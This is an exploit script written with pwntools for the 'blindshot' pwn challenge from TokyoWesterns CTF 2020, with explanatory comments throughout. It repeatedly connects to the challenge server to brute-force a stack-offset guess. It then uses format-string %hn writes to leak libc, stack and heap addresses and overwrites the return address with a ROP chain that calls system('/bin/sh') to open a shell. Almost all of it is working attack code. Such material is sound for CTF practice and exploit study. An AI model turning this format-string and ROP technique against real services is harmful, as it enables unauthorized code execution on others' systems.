TokyoWesterns CTF 2020 — exploit script for the `blindshot` pwn challenge (format-string write primitive; reconnects to the remote service until a guessed stack offset matches).
| from pwn import * | |
| import random | |
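p = None   # live connection; becomes a pwntools tube on the first successful attempt

# libc shipped with the challenge.  Loaded once, outside the retry loop
# (nothing about it changes between attempts).
libc = ELF("./libc-2.31.so", checksec=False)

# --- stage-1 format-string payload ------------------------------------------
# Every number below is a *character count*: %hn / %hhn store the number of
# characters printed so far, so each "%{n}x" width is the distance from the
# previous %n to the counter value whose low byte(s) we want stored.
#
# `off` is a guess for the low 16 bits of a stack address.  Stack ASLR moves
# those bits between runs, so the loop further down reconnects until a run
# happens to match the guess (detected by the page-alignment check).
off = (0xb80 << 4) | 0x8                               # 0xb808
off_fd = off + 20                                      # 20 counter steps later: the fd field

# Absolute counter values first ...
point_service = (off_fd & 0xf000) + 0x1000 + 0x8e      # low byte of a return address -> 0x8e
point_service2 = (off & 0xf000) + 0x1000 + 0x8e        # same write, reached from `off` (write16 uses it)
set_fd1 = (point_service & 0xf000) + 0x1000 + 0x1      # low byte of the fd -> 1 (stdout)
tmp = point_service2                                   # write16() needs this absolute value
# ... then turned into distances from the preceding %n.  The "+0x1000" keeps
# every distance positive.  The order of these three lines matters.
set_fd1 -= point_service
point_service -= off_fd
point_service2 -= off

# %{off-3}x plus three %c brings the counter to `off`, stored by the first
# %hn; %9x plus eleven %c brings it to `off_fd`, stored by the second %hn;
# then two positional single-byte writes (%48$hhn, %46$hhn) at the counts
# computed above.
stage1 = "%{}x%c%c%c%hn%9x%c%c%c%c%c%c%c%c%c%c%c%hn%{}x%48$hhn%{}x%46$hhn".format(
    off - 3, point_service, set_fd1)
# Same write again, followed by three pointer leaks behind a "|yes|" marker.
# By how they are used below they are a libc pointer, a stack pointer and a
# heap pointer.
stage1_leak = stage1 + "|yes|" + "%16$p|%5$p|%9$p|"

while True:
    try:
        # p = process("./blindshot")
        p = remote("pwn01.chal.ctf.westerns.tokyo", 12463)
        p.sendlineafter(">", stage1)
        p.sendlineafter(">", stage1_leak)
        p.recvuntil("|yes|")
        # 159923 is the leaked pointer's offset into libc-2.31.so (taken as
        # given; re-derive it if a different libc build is used).
        libc_base = int(p.recvuntil("|", drop=True), 16) - 159923
        stack_leak = int(p.recvuntil("|", drop=True), 16)
        heap_leak = int(p.recvuntil("|", drop=True), 16)
    except Exception as exc:
        # Wrong guess, dropped connection or unparsable leak: retry.  Not a
        # bare `except:` so Ctrl-C / SystemExit still stop the brute force,
        # and the close is guarded because a failed remote() leaves `p`
        # untouched (None on the very first attempt).
        log.debug("attempt failed: %r", exc)
        if p is not None:
            p.close()
        continue
    # A genuine libc base is page aligned; anything else means the stack
    # guess was wrong this run and the leaked values are garbage.
    if (libc_base & 0xfff) == 0:
        break
    p.close()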
# From here on the stack guess has matched and the leaks are trusted:
# rebase libc on the leak and report what was learned.
libc.address = libc_base
for leak in (libc_base, stack_leak, heap_leak):
    print("{:#x}".format(leak))

# Gadget offsets are specific to the shipped libc-2.31.so.
pop_rdi = libc_base + 0x26b72   # pop rdi ; ret
ret = libc_base + 0x25679       # ret (unused below; pop_rdi + 1 is used instead)

# Third stage: the same format-string write as before, except the fd byte
# becomes 3 (1 + 2) instead of 1.  Presumably the client socket, so that the
# service's output comes back over the connection -- confirm against the binary.
set_fd1 += 2

# Stack slots the write primitive targets, reduced to their low 32 bits
# (write16 only ever uses the low 16 bits of an offset anyway).
ret_loc = (stack_leak - 256) & 0xffffffff   # where the ROP chain is written (saved return address, by name)
rbp_loc = (stack_leak - 296) & 0xffffffff   # unused
bof = stack_leak - 1080                     # unused

p.sendlineafter(">", "%{}x%c%c%c%hn%9x%c%c%c%c%c%c%c%c%c%c%c%hn%{}x%48$hhn%{}x%46$hhn".format(off - 3, point_service, set_fd1))
def write16(offset32, nilai):
    """Store the 16-bit value ``nilai`` at the stack slot whose low 16
    address bits are ``offset32 & 0xffff``.

    Two format-string lines are sent back to back without waiting for the
    prompt:
      1. pad the counter to ``offset32 & 0xffff`` and store it with
         ``%33$hn`` -- presumably this re-points a pointer on the stack at
         the target slot;
      2. pad the counter to ``nilai`` and store it through that pointer
         with ``%46$hn``.
    Both lines start with the ``%hn`` / ``%48$hhn`` prefix from stage 1,
    which brings the counter to ``tmp`` (``off + point_service2``); the
    final width is then the distance from ``tmp`` to the wanted count.
    ``+0x100000`` keeps that distance positive, and only the low 16 bits of
    the count reach the ``%hn``.  ``nilai`` is not masked, so callers are
    expected to pass values below 0x10000.  The positional indexes 33/46/48
    are specific to this binary's stack layout.
    """
    base = (tmp & 0xf00000) + 0x100000
    pad_to_target = base + (offset32 & 0xffff) - tmp
    p.sendline("%{}x%c%c%c%hn%{}x%48$hhn%{}x%33$hn".format(off - 3, point_service2, pad_to_target))
    pad_to_value = base + nilai - tmp
    p.sendline("%{}x%c%c%c%hn%{}x%48$hhn%{}x%46$hn".format(off - 3, point_service2, pad_to_value))
def write32(offset32, nilai):
    """Write a 32-bit value as two 16-bit stores, low half first.

    ``nilai`` is expected to fit in 32 bits: the high half is shifted, not
    masked, before being handed to ``write16``.
    """
    low_half, high_half = nilai & 0xffff, nilai >> 16
    write16(offset32, low_half)
    write16(offset32 + 2, high_half)
def write64(offset32, nilai):
    """Write a 64-bit value as two 32-bit stores.

    The high half is written first and the low half last, so the slot only
    holds the complete value once the final store lands (the reason for the
    order is not stated here -- presumably to avoid a half-written pointer
    being used in between).
    """
    high_half = nilai >> 32
    low_half = nilai & 0xffffffff
    write32(offset32 + 4, high_half)
    write32(offset32, low_half)
# ROP chain laid over the saved return address:
#   pop rdi ; ret   <- "/bin/sh"
#   ret             (pop_rdi + 1: a lone `ret`, commonly needed so system()
#                    is entered with a 16-byte aligned stack)
#   system
chain = [
    pop_rdi,
    next(libc.search(b"/bin/sh")),
    pop_rdi + 1,
    libc.symbols['system'],
]
for slot, value in enumerate(chain):
    write64(ret_loc + 8 * slot, value)
p.interactive()